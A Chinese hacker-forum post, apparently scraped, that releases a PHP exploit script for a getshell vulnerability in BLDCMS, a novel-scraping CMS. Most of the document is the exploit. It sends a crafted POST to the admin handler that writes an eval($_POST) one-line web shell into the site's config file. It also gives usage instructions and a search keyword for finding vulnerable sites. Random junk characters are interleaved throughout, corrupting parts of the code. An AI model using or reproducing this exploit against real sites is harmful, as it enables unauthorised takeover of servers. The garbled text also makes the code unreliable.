之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞3 ]- L+ @; n4 ~
4 H7 r% F0 V2 Y : F, |# H8 T" ^7 f: ~
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 + F! d, k4 p4 ^2 X) L' O9 f+ C
: q+ O5 V+ _8 V; e: L }. T
既然都有人发了 我就把我之前写好的EXP放出来吧
3 n4 C$ H+ j! `$ O! Z5 f
- i! V0 K& w/ e7 |% P; @8 N! W- Hview source print?01.php;">0 n* }0 B, |8 P5 ~ U3 R. u
02.<!--?php
( U& q1 F. A' A; W/ V( Q03.echo "-------------------------------------------------------------------
, W7 `: y# ` F( B$ z04. 8 a( A& U0 k6 L/ R
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP- M7 n" G. L# r* D
06. 0 P" Z1 n0 a3 l ]& C+ d
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun* l$ l; _' E! T, W0 a8 `
08. - _. }0 n4 x* ]" {, L3 O3 A
09.QQ:981009941\r\n 2013.3.21\r\n
+ W+ T7 v. K5 e( z! n9 k1 F n7 U# g9 u10.
f* x3 U3 r8 F11.
* R. N' T" {( M, G* Z12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码% r+ s9 r r9 T5 u6 o( z+ O! e* o
13.
' T3 y: z$ |1 \$ k* u2 u) @14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------0 v9 c, M# A9 L
15. : f H( i# z x6 n2 g2 @2 O
16.--------------------------------------------------------------------\r\n";
4 D, `4 M8 T3 C" t4 O/ t+ P" Z# d17.$url=$argv[1];
' w1 {. L- V! ]2 U& ?( g/ O18.$dir=$argv[2];3 O* d4 `; T8 v. O& H
19.$pass=$argv[3];
' `1 m: l# |+ Y6 }20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
! @4 R" ~8 H# A% K6 `21.if (emptyempty($pass)||emptyempty($url))
6 z3 P7 _/ R) Z) ]22.{exit("请输入参数");}
, D% J8 O4 s# _+ X" z23.else
& Y$ `0 ^5 W# s [4 M5 [24.{0 v- R" w2 ?% [
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev) x* M6 F W9 @6 @
26. ) _* S: D' \. b. J
27.al;
! v H- a, {" \+ [. ^* f$ C28.$length = strlen($fuckdata);* e$ @; v$ G: R5 X" G, L5 H4 ?- o
29.function getshell($url,$pass)
" ?7 E4 S, |2 q9 K o# [30.{3 T+ W2 K# D- I
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
1 n, Q5 G6 P! \& \: t7 D32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";8 m+ ~" ^: X& F# x) P1 @; G X; c4 M
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
# N! }5 l! w; ]! G34.$header .= "User-Agent: MSIE\r\n";. A2 N) D" S$ P$ |2 T9 }3 G6 W
35.$header .= "Host:".$url."\r\n";
2 r+ t. U" u% w: q' l36.$header .= "Content-Length: ".$length."\r\n";1 [& P, ~+ M6 g# u* L: O
37.$header .= "Connection: Close\r\n";
+ c' B5 T9 Y' _1 J8 _% w38.$header .="\r\n";: n3 H* x2 c( Y" q) v6 O* |3 B2 h; ~
39.$header .= $fuckdata."\r\n\r\n";
3 R* E2 N, ?2 Z+ i40.$fp = fsockopen($url, 80,$errno,$errstr,15);9 _( D K0 v. X% D5 Y& E8 V6 d2 z
41.if (!$fp)6 C9 T( g' c, S+ @) E
42.{
. B9 G* H+ B. }. T9 C43.exit ("利用失败:请检查指定目标是否能正常打开");0 H" I# Y5 V7 U
44.}
[/ q9 o% F; |+ j45.else{ if (!fputs($fp,$header))% S: n1 {+ D( l4 w3 g( B
46.{exit ("利用失败");}) `7 Q1 T" L8 w! R1 q
47.else
2 V: Z! X9 k, E& k: v1 `48.{
9 J8 J6 I& Q. l% ]49.$receive = '';7 @# C# k; z/ a; B) h
50.while (!feof($fp)) {5 W$ ^. j" |& B: B8 R
51.$receive .= @fgets($fp, 1000);, K) Q8 }7 h8 t o% @
52.}
3 Q8 a& s0 j/ r& Z53.@fclose($fp);
+ i5 g6 ]( s* ^5 A, k* C' v# I54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标! Q4 G( m$ u4 W
55. $ r' Z+ i. _! V8 |+ F# F1 b
56.GPC是否=off)";3 n. |/ I. y" T5 K
57.}}, h1 y0 j( G2 I- a0 k8 j
58.}
$ D8 v, ^1 V7 C0 V: s59.}3 Z+ ~7 {9 q3 P: q ]7 P
60.getshell($url,$pass);
7 |7 k" M; f& @61.?-->: n: Y& m4 I% T, c e4 i; x
2 s' q' v }9 Q9 U
, E+ t* R) H* h" X# w9 |
3 z6 ?# k' q+ m1 ~8 Fby 数据流
: F* H1 @5 c) @ M: _1 m |